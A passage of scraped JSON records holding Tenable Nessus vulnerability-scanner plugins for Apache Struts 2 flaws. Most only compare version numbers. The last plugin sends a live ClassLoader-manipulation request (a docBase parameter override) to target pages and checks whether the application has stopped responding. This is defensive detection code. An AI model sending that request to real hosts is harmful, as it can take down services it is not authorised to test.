script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-2134\", \"CVE-2013-2135\");\n script_bugtraq_id(60345, 60346);\n\n script_name(english:\"Apache Struts 2.x < 2.3.14.3 RCE (S2-015)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by a remote command execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.14.3. It, therefore, is affected by a remote command\nexecution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-015\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.14.3 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2135\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.14.2\", \"fixed_version\" : \"2.3.14.3\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T14:15:07", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.15.1. It, therefore, is affected by multiple vulnerabilities including a remote command execution vulnerability and an open redirect vulnerability.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-09-10T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.15.1 Multiple Vulnerabilities (S2-016) (S2-017)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2248", "CVE-2013-2251"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_15_1.NASL", "href": "https://www.tenable.com/plugins/nessus/117362", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117362);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2013-2248\", \"CVE-2013-2251\");\n script_bugtraq_id(61189, 61196);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"Apache Struts 2.x < 2.3.15.1 Multiple Vulnerabilities (S2-016) (S2-017)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.15.1. It, therefore, is affected by multiple\nvulnerabilities including a remote command execution vulnerability\nand an open redirect vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-016\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-017\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.15.1 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2251\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.15\", \"fixed_version\" : \"2.3.15.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:46", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.14.2. It, therefore, is affected by multiple vulnerabilities including a remote command execution vulnerability and a cross-site scripting (XSS) vulnerability.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-09-10T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.14.2 Multiple Vulnerabilities (S2-014)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_14_2.NASL", "href": "https://www.tenable.com/plugins/nessus/117364", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117364);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-1966\", \"CVE-2013-2115\");\n script_bugtraq_id(60166, 60167);\n\n script_name(english:\"Apache Struts 2.x < 2.3.14.2 Multiple Vulnerabilities (S2-014)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.14.2. It, therefore, is affected by multiple\nvulnerabilities including a remote command execution vulnerability\nand a cross-site scripting (XSS) vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-014\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.14.2 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2115\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts IncludeParams < 2.3.14.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts includeParams Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.14.1\", \"fixed_version\" : \"2.3.14.2\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, flags:{xss:TRUE});\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:36", "description": "The version of Apache Struts running on the remote host is 2.x prior to to 2.3.20. It, therefore, is affected by multiple class loader vulnerabilities:\n\n - A class loader vulnerability exists in ParametersInterceptor due to improper access restriction to the getClass method. A remote, unauthenticated attacker can exploit this to manipulate the ClassLoader and execute arbitrary code. (CVE-2014-0112)\n\n - A class loader vulnerability exists in CookieInterceptor due to improper access restriction to the getClass. A remote, unauthenticated attacker can exploit this, via a specially crafted request which uses a wildcard cookiesName value to manipulate the ClassLoader and execute arbitrary code. (CVE-2014-0113)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-09-12T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.20 Multiple ClassLoader Manipulation Vulnerabilities (S2-021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0112", "CVE-2014-0113"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_16_2.NASL", "href": "https://www.tenable.com/plugins/nessus/117457", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117457);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-0112\", \"CVE-2014-0113\");\n script_bugtraq_id(61189, 61196);\n\n script_name(english:\"Apache Struts 2.x < 2.3.20 Multiple ClassLoader Manipulation Vulnerabilities (S2-021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework that is affected by multiple class loader\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x prior to to 2.3.20. It, therefore, is affected by\nmultiple class loader vulnerabilities:\n\n - A class loader vulnerability exists in ParametersInterceptor due to improper access restriction to the getClass\n method. A remote, unauthenticated attacker can exploit this to manipulate the ClassLoader and execute arbitrary\n code. (CVE-2014-0112)\n\n - A class loader vulnerability exists in CookieInterceptor due to improper access restriction to the getClass. A\n remote, unauthenticated attacker can exploit this, via a specially crafted request which uses a wildcard cookiesName\n value to manipulate the ClassLoader and execute arbitrary code. (CVE-2014-0113)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n # https://cwiki.apache.org/confluence/display/WW/S2-021\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?736174c4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.20 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0113\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ClassLoader Manipulation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_info = vcf::combined_get_app_info(app:'Apache Struts');\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'min_version' : '2.0.0', 'max_version' : '2.3.16.3', 'fixed_version' : '2.3.20' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:06:55", "description": "The version of Apache Struts installed on the remote host is 2.x prior or equal to 2.5.20. It is, therefore, affected by multiple vulnerabilities:\n\n - The Apache Struts frameworks, when forced, performs double evaluation of attributes' values assigned to certain tags attributes such as id so it is possible to pass in a value that will be evaluated again when a tag's attributes will be rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE). The problem only applies when forcing OGNL evaluation inside a Struts tag attribute, when the expression to evaluate references raw, unvalidated input that an attacker is able to directly modify by crafting a corresponding request.Example:List available EmployeesIf an attacker is able to modify the skillName attribute in a request such that a raw OGNL expression gets passed to the skillName property without further validation, the provided OGNL expression contained in the skillName attribute gets evaluated when the tag is rendered as a result of the request.The opportunity for using double evaluation is by design in Struts since 2.0.0 and a useful tool when done right, which most notably means only referencing validated values in the given expression. However, when referencing unvalidated user input in the expression, malicious code can get injected. In an ongoing effort, the Struts framework includes mitigations for limiting the impact of injected expressions, but Struts before 2.5.22 left an attack vector open which is addressed by this report. This issue is similar to: S2-029 and S2-036. (CVE-2019-0230)\n\n - When a file upload is performed to an Action that exposes the file with a getter, an attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container's temp directory to read only, such that subsequent upload actions will fail. In Struts prior to 2.5.22, stack-accessible values (e.g. Action properties) of type java.io.File and java.nio.File as well as other classes from these standard library packages are not properly protected by the framework to deny access to potentially harmful underlying properties. (CVE-2019-0233)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-08-14T00:00:00", "type": "nessus", "title": "Apache Struts 2.x <= 2.5.20 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_22.NASL", "href": "https://www.tenable.com/plugins/nessus/139607", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139607);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-0230\", \"CVE-2019-0233\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0113\");\n\n script_name(english:\"Apache Struts 2.x <= 2.5.20 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Apache Struts installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts installed on the remote host is 2.x prior or equal to 2.5.20. It is, therefore,\naffected by multiple vulnerabilities:\n\n - The Apache Struts frameworks, when forced, performs double evaluation of attributes' values assigned to\n certain tags attributes such as id so it is possible to pass in a value that will be evaluated again when\n a tag's attributes will be rendered. With a carefully crafted request, this can lead to Remote Code\n Execution (RCE). The problem only applies when forcing OGNL evaluation inside a Struts tag attribute, when\n the expression to evaluate references raw, unvalidated input that an attacker is able to directly modify\n by crafting a corresponding request.Example:List available EmployeesIf an attacker is able to modify the\n skillName attribute in a request such that a raw OGNL expression gets passed to the skillName property\n without further validation, the provided OGNL expression contained in the skillName attribute gets\n evaluated when the tag is rendered as a result of the request.The opportunity for using double evaluation\n is by design in Struts since 2.0.0 and a useful tool when done right, which most notably means only\n referencing validated values in the given expression. However, when referencing unvalidated user input in\n the expression, malicious code can get injected. In an ongoing effort, the Struts framework includes\n mitigations for limiting the impact of injected expressions, but Struts before 2.5.22 left an attack\n vector open which is addressed by this report. This issue is similar to: S2-029 and S2-036. (CVE-2019-0230)\n\n - When a file upload is performed to an Action that exposes the file with a getter, an attacker may\n manipulate the request such that the working copy of the uploaded file is set to read-only. As a result,\n subsequent actions on the file will fail with an error. It might also be possible to set the Servlet\n container's temp directory to read only, such that subsequent upload actions will fail. In Struts prior\n to 2.5.22, stack-accessible values (e.g. Action properties) of type java.io.File and java.nio.File as well\n as other classes from these standard library packages are not properly protected by the framework to deny\n access to potentially harmful underlying properties. (CVE-2019-0233)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-059\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-060\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.5.22 or later or apply the workarounds as referenced in in the vendor security\nbulletins.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0230\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Forced Multi OGNL Evaluation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nwin_local = FALSE;\nos = get_kb_item_or_exit('Host/OS');\nif ('windows' >< tolower(os)) win_local = TRUE;\n\napp_info = vcf::get_app_info(app:'Apache Struts', win_local:win_local);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'min_version' : '2.0.0', 'max_version' : '2.5.20', 'fixed_version' : '2.5.22' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:23:33", "description": "The remote web application appears to use Struts 2, a web framework that utilizes OGNL (Object-Graph Navigation Language) as an expression language. The version of Struts 2 in use is affected by a security bypass vulnerability, possibly due to an incomplete fix for ClassLoader manipulation implemented in version 2.3.16.1.\n\nNote that this plugin will only report the first vulnerable instance of a Struts 2 application.", "cvss3": {}, "published": "2014-04-29T00:00:00", "type": "nessus", "title": "Apache Struts 2 ClassLoader Manipulation Incomplete Fix for Security Bypass", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0112", "CVE-2014-0113"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_16_2_DOS.NASL", "href": "https://www.tenable.com/plugins/nessus/73763", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73763);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-0112\", \"CVE-2014-0113\");\n script_bugtraq_id(67064, 67081);\n script_xref(name:\"CERT\", value:\"719225\");\n\n script_name(english:\"Apache Struts 2 ClassLoader Manipulation Incomplete Fix for Security Bypass\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a security bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web application appears to use Struts 2, a web framework\nthat utilizes OGNL (Object-Graph Navigation Language) as an expression\nlanguage. The version of Struts 2 in use is affected by a security\nbypass vulnerability, possibly due to an incomplete fix for\nClassLoader manipulation implemented in version 2.3.16.1.\n\nNote that this plugin will only report the first vulnerable instance\nof a Struts 2 application.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/announce.html#a20140424\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-021.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.3.16.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0113\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ClassLoader Manipulation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_DENIAL);\n script_family(english:\"Denial of Service\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = eregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = eregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = eregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\nif (max_index(urls) == 0)\n audit(AUDIT_WEB_FILES_NOT, \"Struts 2 .action / .do / .jsp\", port);\n\nurls = list_uniq(urls);\n\nscript = SCRIPT_NAME - \".nasl\" + \"-\" + unixtime();\n\nforeach url (urls)\n{\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : url,\n exit_on_fail : TRUE\n );\n\n if (res[0] !~ \"404 Not Found\")\n {\n vuln_url = url + \"?class['classLoader']['resources']['dirContext']['docBase']=\" + script;\n\n res2 = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n fetch404 : TRUE,\n exit_on_fail : TRUE\n );\n\n if (\n (res2[0] =~ \"200 OK|404 Not Found\")\n )\n { sleep(2);\n # One more check to ensure service is dead\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n fetch404 : TRUE,\n exit_on_fail : TRUE\n );\n if (res[0] =~ \"404 Not Found\")\n {\n vuln = TRUE;\n # Stop after first vulnerable Struts app is found\n break;\n }\n }\n }\n}\n\nif (!vuln) exit(0, 'No 